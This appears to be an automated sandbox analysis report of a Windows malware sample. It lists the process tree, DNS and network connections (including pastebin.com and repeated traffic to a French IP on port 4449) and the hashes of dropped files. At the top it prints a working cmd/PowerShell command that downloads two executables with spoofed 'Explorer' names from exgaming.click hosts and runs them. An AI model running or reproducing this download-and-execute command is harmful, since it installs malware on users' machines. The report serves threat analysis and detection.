"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3100 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zjgwexnp.iti.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8432f55d21c034cd767d75efdbd407e0
SHA1 d2163aac34f4277bd55162f2609c853348852869
SHA256 62f2b61b88e4cfae117a2bb2f93201b161ef0260de36492bb75194edb4bae27e
SHA512 6c191d49f01f7efba21f0dd438fe57efb1a9051ecd39adcaddf983341e1e0cd9740013fc56af43b4bb84e602320af27e756685b6b02e60adc2d6c611c4739368

C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat

MD5 68b8b3004c6cd9d6c23277ee80ba3104
SHA1 5c6e6426152be638eedceaf4ecd72c295ebde0ff
SHA256 48d4ce6ac7e27d8aeea2591a039c43a47d8e450298858dae16ce6ca40d970b7f
SHA512 f01d9b573767cf80a0f9bbaafb662d0ff1ca7183c629317f35b4bea18d154b9ba9f96fb8a637d4949480de6befb1265ea8bb9739198623d8ee1b6cb8c9ff0dc3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4150afd1b9345ce6edfd6aedae150451
SHA1 000189275d81e61d1ea98dbf3d58e7714d4479a0
SHA256 6bb91fceb4307177c9a3809b99e030a03d51d9ff560c5d64593754e219092322
SHA512 6e56bdd5705253d0d80e58cbd750086fbc2dc4da963e122e00fdd9edf58fada2c91915f16f3d505d65b9963bfbc4a1e9c31808befcaeaf5b8045cf1166a263fb

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a0c1a3be9951c0898306fdf9d0c03fc7
SHA1 679a9ecccb4ac2e958a1ed8278f4c495afe41060
SHA256 3ec7afe6d748866326bc1423e0de8f1612cd15851de9240b8f1405884239bdf5
SHA512 38d9de07c7f5e010bce0898e2d4866cede51ab213e4d89cd9f1a19dc98358d29038f44c7ff4f12d26ffabb260bb37c125729fa5f6b7d74a9cd11186af3e10fc8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b91d1b7b4c05d577a614c9626800beb9
SHA1 9a93c28cfa2fe26a72a6352cbda4051901cfb482
SHA256 7e787720dcaec31beb92ef72e98830ebccdf18839993e12383b574af54a8ef46
SHA512 5aa49266a3d0e1007fec4e4264e951c520849563cbf3531b8654d96266e5c3b962ab52a19f6d3f3dd65802dd6e5c93fc49260b8b8e0f0567426fdd4495268e5a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a39620b1b9c4536ebdbf57907a067201
SHA1 e4eb9beb60e8227150cd1c98e08f3ed6249c707c
SHA256 b2682b856d4500c948c4cbe2c9d66fc542819c65bdbba5bb4b31a64443a12172
SHA512 f1074424435a81c8eb6b50fd22d5c636b79df86b04a144cd9025a1184936d48e45351998fd0bc7b27fe791212d8fd6e1ac237c3111446eaada92a98615c7a9e9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 585808c4bc3ca6d78d20f1e59bf096e0
SHA1 5d682dbca5566031a416e3bfbc2acbab73dbd6dd
SHA256 f2122b010a34d88662e0ebb2f9ffa4c33ec029a5ef5dc8dc2474caeb2944df25
SHA512 c65d6c0646a302e5658f9d7ce72419ca2c4108074a5fd41599f90755790f95992cbbca503e70f82b9ae079ed6a185add95520be08c992a95775bb593edfb61b9
